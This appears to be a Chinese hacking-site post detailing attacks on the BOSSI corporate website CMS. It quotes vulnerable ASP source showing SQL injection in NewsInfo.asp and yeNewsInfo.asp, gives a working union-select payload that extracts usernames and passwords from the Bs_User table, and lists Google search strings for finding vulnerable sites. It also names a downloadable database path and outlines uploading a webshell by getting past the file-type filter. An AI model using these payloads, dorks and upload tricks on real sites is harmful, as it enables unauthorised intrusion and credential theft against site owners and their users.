BOSSI 公司企業(yè)網(wǎng)站管理系統(tǒng)注入&上傳漏洞利用
----------------------------------------------------
漏洞一:注入漏洞,
漏洞頁面:NewsInfo.asp,
漏洞代碼:if not isEmpty(request.QueryString("id")) then
id=request.QueryString("id")
else
id=1
end if
Set rs = Server.CreateObject("ADODB.Recordset")
rs.Open "Select * From Conews where id="&id, conn,3,3
'紀(jì)錄訪問次數(shù)
rs("counter")=rs("counter")+1
rs.update
nCounter=rs("counter")
id變量未處理直接代入sql查詢,可注射,用啊d就行
頁面二:yeNewsInfo.asp
漏洞代碼:<%
if not isEmpty(request.QueryString("id")) then
id=request.QueryString("id")
else
id=1
end if
Set rs = Server.CreateObject("ADODB.Recordset")
rs.Open "Select * From Yenews where id="&id, conn,3,3
'紀(jì)錄訪問次數(shù)
rs("counter")=rs("counter")+1
rs.update
nCounter=rs("counter")
'定義內(nèi)容
content=ubbcode(rs("content"))
%>
原理同上,可注入。
漏洞二:數(shù)據(jù)庫下載漏洞
數(shù)據(jù)庫地址:Database/DataShop.mdb
為建立放下載表,可任意下載!
漏洞三:上傳漏洞
漏洞頁面:upfile.asp ,upfilea.asp
問題代碼:fileExt=lcase(file.FileExt)
Forumupload=split(UpFileType,"|")
for i=0 to ubound(Forumupload)
if fileEXT=trim(Forumupload(i)) then
EnableUpload=true
exit for
end if
next
if fileEXT="asp" or fileEXT="asa" or fileEXT="aspx" then
EnableUpload=false
end if
if EnableUpload=false then
msg="這種文件類型不允許上傳!\n\n只允許上傳這幾種文件類型:" & UpFileType
founderr=true
end if
和那個(gè)良精的上傳漏洞一樣,不知道是誰抄誰的代碼了!注冊(cè)用戶,本地上傳php的大馬或者加空格過濾上傳asp大馬,具體方法我就不說了,在淺析良精企業(yè)網(wǎng)站管理程序一文中提到過了!不再贅述!
漏洞利用:注入,Google:inurl:yeNewsInfo.asp?Id
注入語句:%20and%201=2%20union%20select%201,username,3,4,password%20from%20Bs_User

或者啊d:需要手動(dòng)添加表段:Bs_User

數(shù)據(jù)庫漏洞利用:
挖掘機(jī):關(guān)鍵字:inurl:yeNewsInfo.asp?Id
后綴:Database/DataShop.mdb

關(guān)于上傳漏洞的利用我就不演示了,可參照 淺析良精企業(yè)網(wǎng)站管理系統(tǒng)漏洞 一文。
版權(quán)聲明:本站文章來源標(biāo)注為YINGSOO的內(nèi)容版權(quán)均為本站所有,歡迎引用、轉(zhuǎn)載,請(qǐng)保持原文完整并注明來源及原文鏈接。禁止復(fù)制或仿造本網(wǎng)站,禁止在非maisonbaluchon.cn所屬的服務(wù)器上建立鏡像,否則將依法追究法律責(zé)任。本站部分內(nèi)容來源于網(wǎng)友推薦、互聯(lián)網(wǎng)收集整理而來,僅供學(xué)習(xí)參考,不代表本站立場(chǎng),如有內(nèi)容涉嫌侵權(quán),請(qǐng)聯(lián)系alex-e#qq.com處理。
關(guān)注官方微信